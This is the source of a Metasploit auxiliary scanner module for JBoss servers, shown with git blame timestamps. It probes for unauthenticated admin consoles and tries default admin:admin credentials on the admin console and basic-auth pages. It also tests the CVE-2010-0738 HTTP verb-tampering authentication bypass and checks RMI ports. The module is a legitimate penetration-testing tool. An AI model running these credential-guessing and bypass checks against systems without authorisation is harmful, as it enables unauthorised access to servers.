metasploit-framework/modules/auxiliary/scanner/http/jboss_vulnscan.rb

236 lines
6.8 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss Vulnerability Scanner',
2015-04-07 23:21:08 +00:00
'Description' => %q(
2013-08-30 21:28:54 +00:00
This module scans a JBoss instance for a few vulnerablities.
2015-04-07 23:21:08 +00:00
),
'Author' =>
[
'Tyler Krpata',
'Zach Grace <@ztgrace>'
],
2013-08-30 21:28:54 +00:00
'References' =>
[
[ 'CVE', '2010-0738' ] # VERB auth bypass
],
'License' => BSD_LICENSE
))
register_options(
[
2015-04-07 23:21:08 +00:00
OptString.new('VERB', [ true, "Verb for auth bypass testing", "HEAD"])
2013-08-30 21:28:54 +00:00
], self.class)
end
def run_host(ip)
res = send_request_cgi(
{
2015-04-07 23:21:08 +00:00
'uri' => "/" + Rex::Text.rand_text_alpha(12),
2013-08-30 21:28:54 +00:00
'method' => 'GET',
2015-04-07 23:21:08 +00:00
'ctype' => 'text/plain'
2015-05-01 22:37:45 +00:00
})
2013-08-30 21:28:54 +00:00
if res
2015-04-07 23:21:08 +00:00
info = http_fingerprint(:response => res)
2013-08-30 21:28:54 +00:00
print_status(info)
2015-04-07 23:21:08 +00:00
if res.body && />(JBoss[^<]+)/.match(res.body)
2013-08-30 21:28:54 +00:00
print_error("#{rhost}:#{rport} JBoss error message: #{$1}")
end
2015-04-07 23:21:08 +00:00
apps = [
'/jmx-console/HtmlAdaptor',
2013-08-30 21:28:54 +00:00
'/status',
'/web-console/ServerInfo.jsp',
# apps added per Patrick Hof
'/web-console/Invoker',
'/invoker/JMXInvokerServlet'
]
print_status("#{rhost}:#{rport} Checking http...")
apps.each do |app|
check_app(app)
end
jboss_as_default_creds
2013-08-30 21:28:54 +00:00
ports = {
# 1098i, 1099, and 4444 needed to use twiddle
1098 => 'Naming Service',
1099 => 'Naming Service',
4444 => 'RMI invoker'
}
print_status("#{rhost}:#{rport} Checking services...")
2015-04-07 23:21:08 +00:00
ports.each do |port, service|
status = test_connection(ip, port) == :up ? "open" : "closed"
2013-08-30 21:28:54 +00:00
print_status("#{rhost}:#{rport} #{service} tcp/#{port}: #{status}")
end
end
end
def check_app(app)
res = send_request_cgi({
'uri' => app,
'method' => 'GET',
2015-04-07 23:21:08 +00:00
'ctype' => 'text/plain'
2015-05-01 22:37:45 +00:00
})
2013-08-30 21:28:54 +00:00
2015-04-07 23:21:08 +00:00
if res
2013-08-30 21:28:54 +00:00
case
when res.code == 200
print_good("#{rhost}:#{rport} #{app} does not require authentication (200)")
when res.code == 403
print_status("#{rhost}:#{rport} #{app} restricted (403)")
when res.code == 401
print_status("#{rhost}:#{rport} #{app} requires authentication (401): #{res.headers['WWW-Authenticate']}")
bypass_auth(app)
basic_auth_default_creds(app)
2013-08-30 21:28:54 +00:00
when res.code == 404
print_status("#{rhost}:#{rport} #{app} not found (404)")
when res.code == 301, res.code == 302
print_status("#{rhost}:#{rport} #{app} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")
else
print_status("#{rhost}:#{rport} Don't know how to handle response code #{res.code}")
end
else
print_status("#{rhost}:#{rport} #{app} not found")
end
end
2015-04-07 23:21:08 +00:00
def jboss_as_default_creds
print_status("#{rhost}:#{rport} Checking for JBoss AS default creds")
2015-04-07 23:21:08 +00:00
session = jboss_as_session_setup(rhost, rport)
return false if session.nil?
2015-04-07 23:21:08 +00:00
# Default AS creds
2015-05-01 22:37:45 +00:00
username = 'admin'
password = 'admin'
2015-04-07 23:21:08 +00:00
res = send_request_raw({
2015-05-01 22:37:45 +00:00
'uri' => '/admin-console/login.seam',
'method' => 'POST',
'version' => '1.1',
'vhost' => "#{rhost}",
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded',
'Cookie' => "JSESSIONID=#{session['jsessionid']}"
2015-04-07 23:21:08 +00:00
},
2015-05-01 22:37:45 +00:00
'data' => "login_form=login_form&login_form%3Aname=#{username}&login_form%3Apassword=#{password}&login_form%3Asubmit=Login&javax.faces.ViewState=#{session["viewstate"]}"
})
2015-04-07 23:21:08 +00:00
# Valid creds if 302 redirected to summary.seam and not error.seam
2015-05-01 22:37:45 +00:00
if res && res.code == 302 && res.headers.to_s !~ /error.seam/m && res.headers.to_s =~ /summary.seam/m
2015-04-07 23:21:08 +00:00
print_good("#{rhost}:#{rport} Authenticated using #{username}:#{password} at /admin-console/")
add_creds(username, password)
else
print_status("#{rhost}:#{rport} Could not guess admin credentials")
end
end
def add_creds(username, password)
service_data = {
address: rhost,
port: rport,
2015-05-01 22:37:45 +00:00
service_name: 'jboss',
protocol: 'tcp',
workspace_id: framework.db.workspace.id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
private_data: password,
private_type: :password,
username: username
}.merge(service_data)
credential_core = create_credential(credential_data)
credential_data[:core] = credential_core
create_credential_login(credential_data)
end
2013-08-30 21:28:54 +00:00
def jboss_as_session_setup(rhost, rport)
res = send_request_raw({
2015-05-01 22:37:45 +00:00
'uri' => '/admin-console/login.seam',
'method' => 'GET',
'version' => '1.1',
2015-04-07 23:21:08 +00:00
'vhost' => "#{rhost}"
2015-05-01 22:37:45 +00:00
})
2015-05-01 22:37:45 +00:00
unless res
return nil
end
begin
viewstate = /javax.faces.ViewState" value="(.*)" auto/.match(res.body).captures[0]
jsessionid = /JSESSIONID=(.*);/.match(res.headers.to_s).captures[0]
rescue ::NoMethodError
print_status("#{rhost}:#{rport} Could not guess admin credentials")
return nil
end
2015-05-01 22:37:45 +00:00
{ 'jsessionid' => jsessionid, 'viewstate' => viewstate }
end
def bypass_auth(app)
2013-08-30 21:28:54 +00:00
print_status("#{rhost}:#{rport} Check for verb tampering (HEAD)")
res = send_request_raw({
'uri' => app,
'method' => datastore['VERB'],
'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason
2015-05-01 22:37:45 +00:00
})
2015-04-07 23:21:08 +00:00
if res && res.code == 200
2013-08-30 21:28:54 +00:00
print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering")
else
print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
end
end
2013-08-30 21:28:54 +00:00
def basic_auth_default_creds(app)
2013-08-30 21:28:54 +00:00
res = send_request_cgi({
'uri' => app,
'method' => 'GET',
'ctype' => 'text/plain',
2015-04-07 23:21:08 +00:00
'authorization' => basic_auth('admin', 'admin')
2015-05-01 22:37:45 +00:00
})
2015-04-07 23:21:08 +00:00
if res && res.code == 200
print_good("#{rhost}:#{rport} Authenticated using admin:admin at #{app}")
2015-04-07 23:21:08 +00:00
add_creds("admin", "admin")
2013-08-30 21:28:54 +00:00
else
print_status("#{rhost}:#{rport} Could not guess admin credentials")
end
end
# function stole'd from mssql_ping
2015-04-07 23:21:08 +00:00
def test_connection(ip, port)
2013-08-30 21:28:54 +00:00
begin
sock = Rex::Socket::Tcp.create(
'PeerHost' => ip,
'PeerPort' => port,
'Timeout' => 20
2015-04-07 23:21:08 +00:00
)
2013-08-30 21:28:54 +00:00
rescue Rex::ConnectionError
return :down
end
sock.close
return :up
end
end